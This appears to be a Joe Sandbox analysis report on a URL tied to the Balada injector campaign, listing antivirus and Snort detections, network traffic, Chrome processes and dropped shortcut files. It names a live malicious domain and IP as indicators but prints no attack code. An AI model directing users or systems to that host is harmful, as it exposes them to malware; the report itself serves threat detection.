Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://bind.bestresulttostart.com/scriΡts/statistics.js?s=7.8.2

Overview

General Information

Sample URL:https://bind.bestresulttostart.com/scriΡts/statistics.js?s=7.8.2
Analysis ID:1431512
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Stores files to the Windows start menu directory
Uses insecure TLS / SSL version for HTTPS connection

Classification

  • System is w10x64
  • chrome.exe (PID: 6252 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 4324 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2420 --field-trial-handle=2336,i,16502000331635370326,7133518324647043838,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 5148 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://bind.bestresulttostart.com/scripts/statistics.js?s=7.8.2" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
Timestamp:04/25/24-11:19:42.943374
SID:2051948
Source Port:49319
Destination Port:53
Protocol:UDP
Classtype:A Network Trojan was detected
Timestamp:04/25/24-11:19:41.217581
SID:2051949
Source Port:49709
Destination Port:443
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:04/25/24-11:19:41.218306
SID:2051949
Source Port:49710
Destination Port:443
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:04/25/24-11:19:40.891198
SID:2051948
Source Port:52222
Destination Port:53
Protocol:UDP
Classtype:A Network Trojan was detected
Timestamp:04/25/24-11:19:42.942675
SID:2051948
Source Port:65170
Destination Port:53
Protocol:UDP
Classtype:A Network Trojan was detected
Timestamp:04/25/24-11:19:40.890794
SID:2051948
Source Port:49613
Destination Port:53
Protocol:UDP
Classtype:A Network Trojan was detected
Timestamp:04/25/24-11:19:43.280051
SID:2051949
Source Port:49714
Destination Port:443
Protocol:TCP
Classtype:A Network Trojan was detected

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://bind.bestresulttostart.com/scripts/statistics.js?s=7.8.2Avira URL Cloud: detection malicious, Label: malware
Source: https://bind.bestresulttostart.com/favicon.icoAvira URL Cloud: Label: malware
Source: bind.bestresulttostart.comVirustotal: Detection: 19%Perma Link
Source: https://bind.bestresulttostart.com/scripts/statistics.js?s=7.8.2Virustotal: Detection: 20%Perma Link
Source: https://bind.bestresulttostart.com/scripts/statistics.js?s=7.8.2HTTP Parser: No favicon
Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49722 version: TLS 1.0
Source: unknownHTTPS traffic detected: 23.216.73.151:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.216.73.151:443 -> 192.168.2.5:49717 version: TLS 1.2

Networking

barindex
Source: TrafficSnort IDS: 2051948 ET CURRENT_EVENTS Balada Domain in DNS Lookup (bestresulttostart .com) 192.168.2.5:49613 -> 1.1.1.1:53
Source: TrafficSnort IDS: 2051948 ET CURRENT_EVENTS Balada Domain in DNS Lookup (bestresulttostart .com) 192.168.2.5:52222 -> 1.1.1.1:53
Source: TrafficSnort IDS: 2051949 ET CURRENT_EVENTS Balada Domain in TLS SNI (bestresulttostart .com) 192.168.2.5:49709 -> 193.163.7.113:443
Source: TrafficSnort IDS: 2051949 ET CURRENT_EVENTS Balada Domain in TLS SNI (bestresulttostart .com) 192.168.2.5:49710 -> 193.163.7.113:443
Source: TrafficSnort IDS: 2051948 ET CURRENT_EVENTS Balada Domain in DNS Lookup (bestresulttostart .com) 192.168.2.5:65170 -> 1.1.1.1:53
Source: TrafficSnort IDS: 2051948 ET CURRENT_EVENTS Balada Domain in DNS Lookup (bestresulttostart .com) 192.168.2.5:49319 -> 1.1.1.1:53
Source: TrafficSnort IDS: 2051949 ET CURRENT_EVENTS Balada Domain in TLS SNI (bestresulttostart .com) 192.168.2.5:49714 -> 193.163.7.113:443
Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49722 version: TLS 1.0
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.216.73.151
Source: unknownTCP traffic detected without corresponding DNS query: 23.216.73.151
Source: unknownTCP traffic detected without corresponding DNS query: 23.216.73.151
Source: unknownTCP traffic detected without corresponding DNS query: 23.216.73.151
Source: unknownTCP traffic detected without corresponding DNS query: 23.216.73.151
Source: unknownTCP traffic detected without corresponding DNS query: 23.216.73.151
Source: unknownTCP traffic detected without corresponding DNS query: 23.216.73.151
Source: unknownTCP traffic detected without corresponding DNS query: 23.216.73.151
Source: unknownTCP traffic detected without corresponding DNS query: 23.216.73.151
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.216.73.151
Source: unknownTCP traffic detected without corresponding DNS query: 23.216.73.151
Source: unknownTCP traffic detected without corresponding DNS query: 23.216.73.151
Source: unknownTCP traffic detected without corresponding DNS query: 23.216.73.151
Source: unknownTCP traffic detected without corresponding DNS query: 23.216.73.151
Source: unknownTCP traffic detected without corresponding DNS query: 23.216.73.151
Source: unknownTCP traffic detected without corresponding DNS query: 23.216.73.151
Source: unknownTCP traffic detected without corresponding DNS query: 23.216.73.151
Source: unknownTCP traffic detected without corresponding DNS query: 23.216.73.151
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /scripts/statistics.js?s=7.8.2 HTTP/1.1Host: bind.bestresulttostart.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: bind.bestresulttostart.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bind.bestresulttostart.com/scripts/statistics.js?s=7.8.2Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: bind.bestresulttostart.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficDNS traffic detected: DNS query: bind.bestresulttostart.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownHTTPS traffic detected: 23.216.73.151:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.216.73.151:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: classification engineClassification label: mal80.win@16/11@6/4
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2420 --field-trial-handle=2336,i,16502000331635370326,7133518324647043838,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://bind.bestresulttostart.com/scripts/statistics.js?s=7.8.2"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2420 --field-trial-handle=2336,i,16502000331635370326,7133518324647043838,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Registry Run Keys / Startup Folder
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media2
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive3
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://bind.bestresulttostart.com/scripts/statistics.js?s=7.8.2100%Avira URL Cloudmalware
https://bind.bestresulttostart.com/scripts/statistics.js?s=7.8.221%VirustotalBrowse
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
bind.bestresulttostart.com20%VirustotalBrowse
fp2e7a.wpc.phicdn.net0%VirustotalBrowse
bg.microsoft.map.fastly.net0%VirustotalBrowse
SourceDetectionScannerLabelLink
https://bind.bestresulttostart.com/favicon.ico100%Avira URL Cloudmalware
NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.214.172
truefalseunknown
www.google.com
172.217.215.147
truefalse
    high
    bind.bestresulttostart.com
    193.163.7.113
    truetrueunknown
    fp2e7a.wpc.phicdn.net
    192.229.211.108
    truefalseunknown
    NameMaliciousAntivirus DetectionReputation
    https://bind.bestresulttostart.com/scripts/statistics.js?s=7.8.2true
      unknown
      https://bind.bestresulttostart.com/favicon.icotrue
      • Avira URL Cloud: malware
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      239.255.255.250
      unknownReserved
      unknownunknownfalse
      172.217.215.147
      www.google.comUnited States
      15169GOOGLEUSfalse
      193.163.7.113
      bind.bestresulttostart.comDenmark
      1935FR-RENATER-LIMOUSINReseauRegionalLimousinEUtrue
      IP
      192.168.2.5
      Joe Sandbox version:40.0.0 Tourmaline
      Analysis ID:1431512
      Start date and time:2024-04-25 11:18:51 +02:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 3m 5s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:browseurl.jbs
      Sample URL:https://bind.bestresulttostart.com/scriΡts/statistics.js?s=7.8.2
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Number of analysed new started processes analysed:7
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal80.win@16/11@6/4
      EGA Information:Failed
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 0
      • Number of non-executed functions: 0
      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
      • Excluded IPs from analysis (whitelisted): 173.194.219.94, 172.253.124.84, 74.125.136.113, 74.125.136.100, 74.125.136.138, 74.125.136.102, 74.125.136.101, 74.125.136.139, 34.104.35.123, 69.164.42.0, 13.85.23.86, 192.229.211.108, 199.232.214.172, 13.85.23.206, 20.3.187.198, 142.250.105.94
      • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, clientservices.googleapis.com, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, update.googleapis.com, clients.l.google.com, glb.sls.prod.dcat.dsp.trafficmanager.net
      • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
      • Not all processes where analyzed, report is missing behavior information
      • Report size getting too big, too many NtSetInformationFile calls found.
      No simulations
      No context
      No context
      No context
      No context
      No context
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Apr 25 08:19:40 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
      Category:dropped
      Size (bytes):2677
      Entropy (8bit):3.978325309592943
      Encrypted:false
      SSDEEP:48:8tdITsEHH8idAKZdA19ehwiZUklqeh3y+3:8ovK8y
      MD5:BFAF7CA6E2F3350A8BEC1B7AA09D3A38
      SHA1:D4897EEFC4839EBAFE3EEB69C9FC105604EFBC40
      SHA-256:5D795D57DDE9B84B22BA04776CDD9F257F882DC411EEF6AB159346765405CC3B
      SHA-512:51CD4FE8FC7100D2B442A5BF8517654A7083F84DF5F780C9860BC99B65995DCF70A182CAD3746C01474E10D045390DA2F0BD91735482948523CD78D7FB25752B
      Malicious:false
      Reputation:low
      Preview:L..................F.@.. ...$+.,.....Y.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.XrJ....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XrJ....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.XrJ....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.XrJ..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.XuJ...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............S......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Apr 25 08:19:40 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
      Category:dropped
      Size (bytes):2679
      Entropy (8bit):3.9923608675507194
      Encrypted:false
      SSDEEP:48:8XAUtdITsEHH8idAKZdA1weh/iZUkAQkqehsy+2:8xovA9Qly
      MD5:726C9F311093FF72BF6654436DDCD4BB
      SHA1:5F4F723411CBF4EAF4CC1980384EE1FDB7C66B55
      SHA-256:18CA2819C2D7CDBF558E5710005621A3216A9FB35AD8664428716409C86167DE
      SHA-512:2C2B15548DAB01F6C3B9BE719E57FB48367157C170F3EDEA88E2EE4E65E1AEB1A278D8B2E8B8A9E63FBDF3CAD361CA3EF8860B390E5E033781C2AC45368BAF17
      Malicious:false
      Reputation:low
      Preview:L..................F.@.. ...$+.,....3V.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.XrJ....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XrJ....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.XrJ....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.XrJ..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.XuJ...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............S......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
      Category:dropped
      Size (bytes):2693
      Entropy (8bit):4.0037665598978815
      Encrypted:false
      SSDEEP:48:8xtdITsEsH8idAKZdA14tseh7sFiZUkmgqeh7syy+BX:8xovxngy
      MD5:CBFF6CB9541DC4F7616ED97BE921B951
      SHA1:7EF5D94653302241EFF0955BA2486CC88F74923F
      SHA-256:D30EE33418BB2DFDE9BE4B53466C88CA6902A65021BA8B1FAE503E1BB5F04831
      SHA-512:55EA41FFCFA89772EFD4B3C507B21569B02116577430A1D1EB5378060437D2DFD03E1A15B707FE9112544260A8127A14A899A9AC3D61179216E0F460A6C3997A
      Malicious:false
      Reputation:low
      Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.XrJ....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XrJ....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.XrJ....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.XrJ..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............S......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Apr 25 08:19:40 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
      Category:dropped
      Size (bytes):2681
      Entropy (8bit):3.990937993134943
      Encrypted:false
      SSDEEP:48:86dITsEHH8idAKZdA1vehDiZUkwqeh4y+R:85vLKy
      MD5:976C3ADB1B08E7DEAA56EC355CAAEE36
      SHA1:EFECEBB1BAF9092A7484696B40C987F60C94825F
      SHA-256:24F2C1EBFAE2A6D6526B241A1BE0370940751B1F517088DD3287C60575676214
      SHA-512:609DCF5185792BE417DD4503E367F20B78FFA6AD4834D5A2BBBE4F7C107E9D905C7F06AE3495C6A563F5ED8EE32AF07FAC5F21468AE65EEAF3559D077A428965
      Malicious:false
      Reputation:low
